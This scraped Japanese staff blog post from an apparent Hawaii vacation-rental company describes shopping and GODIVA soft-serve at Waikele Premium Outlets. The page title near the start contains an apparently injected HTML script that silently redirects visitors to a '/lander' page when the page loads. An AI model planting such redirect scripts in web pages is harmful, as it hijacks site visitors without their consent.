スタッフブログ│<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html> ,ハワイリゾート,ブログ"> ">

トップページ > スタッフブログ

スタッフブログ スタッフブログ

2019/08/05ワイケレ・プレミアム・アウトレット

カテゴリ:未分類

ALOHA!
レンタルバケーションブログ担当のYukinoです。

ホテルの予約と同様の簡単な手続きで、
自分の家にいるような感覚でリゾートライフを
楽しめるバケーションレンタル。

レンタルバケーションで宿泊費を抑えて、

その分お買い物楽しむのもいいですよね(^_^)

 

先日、ワイケレ・プレミアム・アウトレットに行ってきましたが、

ブランド物がとても安かったので、

ちょこっとご紹介致します!

 

まずは3時のおやつとういことで

GODIVAでソフトクリームを食べました(^_^)

IMG_0129

チョコソフトが濃厚でとても美味しかったです!

暑くてすぐに溶けてしますので、ペロッと頂きましたww

IMG_0128

IMG_0133

お土産のチョコレートも種類が豊富でした。

IMG_0136

 

お楽しみのお買物は、CONVERS、VANS、COACH、kate spade etc…

色々と見ましたが、

今回一番私の中でヒットしたのが

TORY BURCHです!!

なんと40%Off〜60%Offのものまでありました。

とにかく種類が豊富で、

靴のサイズの品揃えはとても良かったです!

この度お財布を探しに行きましたが、

あまりの安さに靴も買ってしまいましたwww

IMG_0171

店員さんも日本人の方がいて、とても感じが良くてお買物しやすかったですよ(^O^)

ぜひ少し足を伸ばしてワイケレまで行ってみてください!

Mahalo〜

 

 

オリンピック 6月に突入しました♪ 渡航サポートのお問い合わせが増えてます♪ ハワイへ行く準備をしませんか? バーの営業再開をホノルル市長が承認
ハワイバケーションレンタル情報 ハワイ情報 お知らせ その他 未分類
2021年7月 2021年6月 2021年5月 2021年4月 2021年3月